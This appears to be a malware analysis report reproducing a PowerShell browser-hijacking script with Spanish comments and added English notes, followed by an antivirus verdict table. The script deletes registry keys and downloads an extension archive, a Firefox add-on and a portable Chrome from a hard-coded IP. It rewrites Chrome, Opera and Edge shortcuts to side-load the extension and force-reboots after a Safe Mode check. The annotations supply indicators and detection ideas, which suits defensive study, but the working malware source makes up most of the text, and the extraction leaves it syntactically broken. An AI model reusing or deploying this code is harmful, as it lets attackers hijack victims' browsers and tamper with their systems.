No static analysis available.
# ---- Analysis notes (added) ----
# Top-level self-cleanup and shortcut-association tampering. The "try {" that
# pairs with the "} catch {" below, and the closing brace of that catch, are not
# present in this dump; the code is left as extracted.

# Define the registry path and the name of the value to delete
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
$valueName = "SetSafeMode"
# Try to delete the registry value.
# RunOnce is an autostart location. Deleting a value named "SetSafeMode" from it
# is consistent with this script having been staged there to run once at boot;
# the Safe Mode check near the end of the script points the same way. Inference,
# not visible here.
Remove-ItemProperty -Path $registryPath -Name $valueName -ErrorAction Stop
Write-Host "El valor del registro '$valueName' fue eliminado exitosamente."
} catch {
# The next two physical lines appear to be one string literal that the dump split
# at a mis-encoded character ("Asegúrate"); left byte-identical.
Write-Host "No se pudo eliminar el valor del registro '$valueName'. Aseg
rate de tener permisos suficientes y de que el valor exista."
# Save the current value of ConfirmPreference
$oldConfirmPreference = $ConfirmPreference
# Set ConfirmPreference to None to suppress confirmation prompts
$ConfirmPreference = 'None'
# Delete the .lnk class key without confirmation.
# HKCR\.lnk is the file-association key for Windows shortcuts; removing it
# recursively changes how the shell resolves .lnk files for every user.
# Detection: deletion of HKEY_CLASSES_ROOT\.lnk is rare in normal operation and
# is a good registry-audit trigger.
Remove-Item -Path "Registry::HKEY_CLASSES_ROOT\.lnk" -Recurse -Force
# Delete the MiArchivoLnk key and its subkeys without confirmation.
# "MiArchivoLnk" is not a standard Windows ProgID; presumably a class registered by
# an earlier stage of the same campaign — not visible in this dump.
Remove-Item -Path "Registry::HKEY_CLASSES_ROOT\MiArchivoLnk" -Recurse -Force
# Restore the original value of ConfirmPreference
$ConfirmPreference = $oldConfirmPreference
# ---- Stage configuration and first payload download (added analysis notes) ----
# Random 16-character name built from digits (48..57) and lowercase letters
# (97..122); reused for the dropped archive, its extraction folder and the
# Firefox add-on file so that file names differ per infection.
$nombre_del_zip = -join ((48..57) + (97..122) | Get-Random -Count 16 | % {[char]$_})
# Drop locations under %PUBLIC%, which is writable by every interactive user and
# shared across profiles.
$rutaArchivoFirefox = $env:PUBLIC + "\Downloads\" + $nombre_del_zip + ".xpi"
$path_del_zip = $env:PUBLIC + "\Documents\" + $nombre_del_zip + ".zip"
$path_del_folder = $env:PUBLIC + "\Documents\" + $nombre_del_zip
# Shortcut locations that the Patch* functions below rewrite: all-users Start
# Menu, per-user Start Menu, taskbar pins, user Desktop and public Desktop.
$program_data_base_path = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\"
$app_data_base_path = $env:APPDATA + "\Microsoft\Windows\Start Menu\Programs\"
$taskbar_base_path = $env:APPDATA + "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\"
$desktop_base_path = [Environment]::GetFolderPath("Desktop") + "\"
$public_desktop_base_path = $env:PUBLIC + "\Desktop\"
# Payload host, hard-coded by IP over plain HTTP. Network IoC: outbound HTTP to
# 64.94.84.206 for extensionreptil2.xpi, extension3922.zip and portable.zip.
$url_firefox = "http://64.94.84.206/extensionreptil2.xpi"
# Firefox install locations probed later before the .xpi is opened with Firefox.
$firefoxPath1 = "C:\Program Files\Mozilla Firefox\firefox.exe"
$firefoxPath2 = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe"
# WScript.Shell COM object used by the helper functions to create/modify .lnk files.
$com_shell = New-Object -COM WScript.Shell
# Argument written into every Chromium-based browser shortcut: side-loads the
# unpacked extension from the extraction folder. The path is hard-coded to
# C:\Users\Public\Documents while the folder itself is derived from $env:PUBLIC;
# the two agree only when %PUBLIC% is at its default.
# Detection: .lnk files whose Arguments contain "--load-extension=" pointing into
# a user-writable directory.
$chromium_argument = "--load-extension=C:\Users\Public\Documents\" + $nombre_del_zip
# OneDrive-redirected Desktop, Spanish and English folder names.
$onedrive_base_path = $env:OneDrive + "\Escritorio\"
$onedrive_base_path_2 = $env:OneDrive + "\Desktop\"
# Fallback browser archive used when no installed Chrome is found (see the Edge branch).
$chrome_portable = "http://64.94.84.206/portable.zip"
# Download and extract the extension archive; stderr is discarded.
Invoke-RestMethod -Uri "http://64.94.84.206/extension3922.zip" -OutFile $path_del_zip 2>$null
# "2>$nul" (not $null) names an undefined variable, so this redirection is probably
# a typo; its exact effect is not verified here.
Expand-Archive -Path $path_del_zip -DestinationPath $path_del_folder 2>$nul
#######################################
# Creates (or overwrites) a shortcut at $AbsPath targeting $Path, with the
# script-level $chromium_argument as its arguments and $Icon as its icon.
# The only caller visible here (PatchEdge) passes a Chrome executable and an
# Edge icon, so the resulting shortcut looks like Edge but launches Chrome with
# the side-loaded extension.
# Arguments: $AbsPath - full path of the .lnk to write
#            $Icon    - IconLocation string
#            $Path    - executable the shortcut targets
# Globals:   $com_shell (read), $chromium_argument (read)
# The closing brace of this function is not present in this dump.
#######################################
function CreateLnkWIco {
Param($AbsPath, $Icon, $Path)
$lnk = $com_shell.CreateShortcut($AbsPath)
$lnk.TargetPath = $Path
# Arguments always come from the global, never from a parameter.
$lnk.Arguments = $chromium_argument
$lnk.IconLocation = $Icon
$lnk.Save() 2>$null
#######################################
# Creates (or overwrites) a shortcut at $AbsPath targeting $Path with the
# script-level $chromium_argument as its arguments. Same as CreateLnkWIco but
# without setting an icon; $Icon is accepted and never used.
# Arguments: $AbsPath - full path of the .lnk to write
#            $Icon    - unused
#            $Path    - executable the shortcut targets
# Globals:   $com_shell (read), $chromium_argument (read)
# The closing brace of this function is not present in this dump.
#######################################
function CreateLnk {
Param($AbsPath, $Icon, $Path)
$lnk = $com_shell.CreateShortcut($AbsPath)
$lnk.TargetPath = $Path
$lnk.Arguments = $chromium_argument
$lnk.Save() 2>$null
#######################################
# Hijacks an existing shortcut in place: WScript.Shell.CreateShortcut on a path
# that already exists loads that shortcut, and only its Arguments are replaced.
# TargetPath and icon are untouched, so the shortcut still opens the legitimate
# browser, now with the rogue extension side-loaded. This is the primary
# persistence/tampering technique in the script.
# Arguments: $AbsPath - full path of the existing .lnk
# Globals:   $com_shell (read), $chromium_argument (read)
# Detection: modification of browser .lnk files in Start Menu / Desktop /
# taskbar-pin locations outside an installer context.
# The closing brace of this function is not present in this dump.
#######################################
function ModifyLnk {
Param($AbsPath)
$lnk = $com_shell.CreateShortcut($AbsPath)
$lnk.Arguments = $chromium_argument
$lnk.Save() 2>$null
#######################################
# Writes a shortcut named $browserName (callers pass "Microsoft Edge.lnk") into
# every shortcut location whose base folder exists, targeting $path with $icon.
# Callers pass a Chrome executable and an Edge icon, so the Edge shortcuts are
# replaced by look-alikes that launch Chrome with the side-loaded extension.
# Arguments: $browserName - file name of the shortcut to write
#            $path        - executable the shortcut targets
#            $icon        - IconLocation string
# Globals:   the *_base_path variables defined at script level (read)
# The closing braces of the if blocks and of the function are not present in this dump.
#######################################
function PatchEdge {
Param($browserName, $path, $icon)
# OneDrive-redirected Desktop (Spanish folder name)
if(Test-Path $onedrive_base_path) {
$onedrive_path = $onedrive_base_path + $browserName
CreateLnkWIco -AbsPath $onedrive_path -Icon $icon -Path $path
# OneDrive-redirected Desktop (English folder name)
if(Test-Path $onedrive_base_path_2) {
$onedrive_path_2 = $onedrive_base_path_2 + $browserName
CreateLnkWIco -AbsPath $onedrive_path_2 -Icon $icon -Path $path
# Public Desktop (all users)
if(Test-Path $public_desktop_base_path) {
$public_desktop_path = $public_desktop_base_path + $browserName
CreateLnkWIco -AbsPath $public_desktop_path -Icon $icon -Path $path
# Current user's Desktop
if(Test-Path $desktop_base_path) {
$desktop_path = $desktop_base_path + $browserName
CreateLnkWIco -AbsPath $desktop_path -Icon $icon -Path $path
# Per-user Start Menu
if(Test-Path $app_data_base_path) {
$app_data_path = $app_data_base_path + $browserName
CreateLnkWIco -AbsPath $app_data_path -Icon $icon -Path $path
# All-users Start Menu (requires write access to ProgramData)
if(Test-Path $program_data_base_path) {
$programdata_path = $program_data_base_path + $browserName
CreateLnkWIco -AbsPath $programdata_path -Icon $icon -Path $path
# Taskbar pins
if(Test-Path $taskbar_base_path) {
$taskbar_path = $taskbar_base_path + $browserName
CreateLnkWIco -AbsPath $taskbar_path -Icon $icon -Path $path
#######################################
# For each known shortcut location: if a shortcut named $browserName already
# exists there, rewrite its Arguments in place (ModifyLnk); otherwise create a new
# shortcut targeting $path (CreateLnk). Used for Chrome, Opera and Opera GX.
# Arguments: $browserName - file name of the shortcut, e.g. "Google Chrome.lnk"
#            $path        - browser executable the shortcut targets
#            $icon        - passed through to CreateLnk, which ignores it
# Globals:   the *_base_path variables defined at script level (read)
# Several closing braces are missing from this dump; the last three locations
# (per-user Start Menu, all-users Start Menu, taskbar) show no Test-Path on the
# base folder, unlike the first four.
#######################################
function PatchChrome {
Param($browserName, $path, $icon)
# OneDrive-redirected Desktop (Spanish folder name)
if(Test-Path $onedrive_base_path) {
$onedrive_path = $onedrive_base_path + $browserName
if(Test-Path $onedrive_path) {
ModifyLnk -AbsPath $onedrive_path
} else {
CreateLnk -AbsPath $onedrive_path -Icon $icon -Path $path
}
# OneDrive-redirected Desktop (English folder name)
if(Test-Path $onedrive_base_path_2) {
$onedrive_path_2 = $onedrive_base_path_2 + $browserName
if(Test-Path $onedrive_path_2) {
ModifyLnk -AbsPath $onedrive_path_2
} else {
CreateLnk -AbsPath $onedrive_path_2 -Icon $icon -Path $path
}
# Public Desktop (all users)
if(Test-Path $public_desktop_base_path) {
$public_desktop_path = $public_desktop_base_path + $browserName
if(Test-Path $public_desktop_path) {
ModifyLnk -AbsPath $public_desktop_path
} else {
CreateLnk -AbsPath $public_desktop_path -Icon $icon -Path $path
}
# Current user's Desktop
if(Test-Path $desktop_base_path) {
$desktop_path = $desktop_base_path + $browserName
if (Test-Path $desktop_path) {
ModifyLnk -AbsPath $desktop_path
} else {
CreateLnk -AbsPath $desktop_path -Icon $icon -Path $path
}
# Per-user Start Menu
$appdata_path = $app_data_base_path + $browserName
if (Test-Path $appdata_path) {
ModifyLnk -AbsPath $appdata_path
} else {
CreateLnk -AbsPath $appdata_path -Icon $icon -Path $path
# All-users Start Menu
$programdata_path = $program_data_base_path + $browserName
if (Test-Path $programdata_path) {
ModifyLnk -AbsPath $programdata_path
} else {
CreateLnk -AbsPath $programdata_path -Icon $icon -Path $path
# Taskbar pins
$taskbar_path = $taskbar_base_path + $browserName
if(Test-Path $taskbar_path) {
ModifyLnk -AbsPath $taskbar_path
} else {
CreateLnk -AbsPath $taskbar_path -Icon $icon -Path $path
#######################################
# Enumerates installed applications from the per-machine and per-user Uninstall
# registry keys (native and WOW6432Node views), keeping only entries with a
# DisplayName. Outputs DisplayName, InstallLocation and DisplayIcon sorted by
# DisplayName. Benign discovery technique; here it drives browser targeting.
# Outputs:   one object per installed application on the pipeline
# The closing brace of this function is not present in this dump.
#######################################
Function GetInstalledApps {
Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*' -ErrorAction Ignore |
Where-Object DisplayName |
Select-Object -Property DisplayName, InstallLocation, DisplayIcon |
Sort-Object -Property DisplayName
# ---- Browser targeting (added analysis notes) ----
# Walks the installed-application list and tampers with one browser per match.
# Closing braces of the ForEach-Object block are not present in this dump, so it
# is not certain whether the final Stop-Process runs inside the loop or after it.
GetInstalledApps | ForEach-Object {
# Chromium-based browsers: rewrite/create shortcuts so they start with
# --load-extension pointing at the dropped folder.
if($_.DisplayName -match "Chrome") {
$exe_path = $_.InstallLocation + "\chrome.exe"
PatchChrome -browserName "Google Chrome.lnk" -path $exe_path -icon $_.DisplayIcon
} elseif($_.DisplayName -match "Opera Stable") {
$exe_path = $_.InstallLocation + "\opera.exe"
PatchChrome -browserName "Navegador Opera.lnk" -path $exe_path -icon $_.DisplayIcon
} elseif ($_.DisplayName -match "Opera GX") {
$exe_path = $_.InstallLocation + "\opera.exe"
PatchChrome -browserName "Navegador Opera GX.lnk" -path $exe_path -icon $_.DisplayIcon
# Firefox: download the .xpi add-on into %PUBLIC%\Downloads and open it with
# Firefox, which normally presents the add-on install prompt to the user.
} elseif ($_.DisplayName -match "Firefox") {
Invoke-WebRequest -Uri $url_firefox -OutFile $rutaArchivoFirefox
if (Test-Path $firefoxPath1) {
Start-Process -FilePath $firefoxPath1 -ArgumentList $rutaArchivoFirefox
} elseif (Test-Path $firefoxPath2) {
Start-Process -FilePath $firefoxPath2 -ArgumentList $rutaArchivoFirefox
}
# Edge: no extension is loaded into Edge itself. Instead, Edge shortcuts are
# replaced with look-alikes (edge.ico from the extracted archive) that launch
# Chrome — the installed copy if present, otherwise a portable copy downloaded
# from the same host into a second random folder under %PUBLIC%\Documents.
} elseif ($_.DisplayName -eq "Microsoft Edge") {
$ico = $path_del_folder + "\edge.ico"
$default_chrome_path = $env:ProgramFiles + "\Google\Chrome\Application\chrome.exe"
if(Test-Path $default_chrome_path) {
PatchEdge -browserName "Microsoft Edge.lnk" -path $default_chrome_path -icon $ico
} else {
$hash_edge = -join ((48..57) + (97..122) | Get-Random -Count 16 | % {[char]$_})
$target_filename = $env:PUBLIC + "\Documents\"+$hash_edge+".zip"
$destination_path = $env:PUBLIC + "\Documents\"+$hash_edge
$exe_path = $destination_path + "\chrome.exe"
# Second network IoC: portable.zip from 64.94.84.206.
Invoke-WebRequest -Uri $chrome_portable -Method Get -OutFile $target_filename
Expand-Archive -Path $target_filename -DestinationPath $destination_path
PatchEdge -browserName "Microsoft Edge.lnk" -path $exe_path -icon $ico
}
# Kill any running Edge so the next launch goes through the replaced shortcuts.
Stop-Process -Name msedge -Force 2>$null
# ---- Safe Mode detection and forced reboot (added analysis notes) ----
# HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option\OptionValue is commonly
# present only while Windows is running in Safe Mode (1 = Minimal, 2 = Network).
# Combined with the "SetSafeMode" RunOnce cleanup at the top, this reads as: the
# script expects to run during a Safe Mode boot (where most security products are
# not loaded), then reboots the machine back to normal mode. Inference; the outer
# "try {" for the -ErrorAction Stop below is not present in this dump.
# Mitigation/detection: alert on RunOnce entries created alongside safeboot
# changes, and on unexpected Restart-Computer invocations from PowerShell.
$safeBootKey = "HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\Option"
$optionValue = Get-ItemProperty -Path $safeBootKey -Name OptionValue -ErrorAction Stop
if($optionValue.OptionValue -ne $null) {
try {
# Poll until Firefox is gone (presumably to let the .xpi installation started
# above complete), then reboot.
while($true) {
# With -ErrorAction Stop, Get-Process throws when no "firefox" process exists,
# so control leaves the loop through the catch below; the else branch is
# effectively unreachable and the reboot happens in the catch.
$firefoxProcess = Get-Process firefox -ErrorAction Stop
if($firefoxProcess) {
Start-Sleep -Seconds 3;
} else {
Restart-Computer -Force
break
}
}
} catch {
# Reached as soon as Firefox is not running: forced reboot without user prompt.
Restart-Computer -Force
}
} catch {
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Heur.BZC.PZQ.Boxter.231.BA309EB8
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.PZQ.Boxter.231.BA309EB8
Tencent Clean
TACHYON Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.PZQ.Boxter.231.BA309EB8
TrendMicro Clean
FireEye Heur.BZC.PZQ.Boxter.231.BA309EB8
Emsisoft Heur.BZC.PZQ.Boxter.231.BA309EB8 (B)
huorong Clean
GData Heur.BZC.PZQ.Boxter.231.BA309EB8
Jiangmin Clean
Varist Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Boxter.231.B2F93054
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX malware (ai score=86)
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Clean
Panda Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.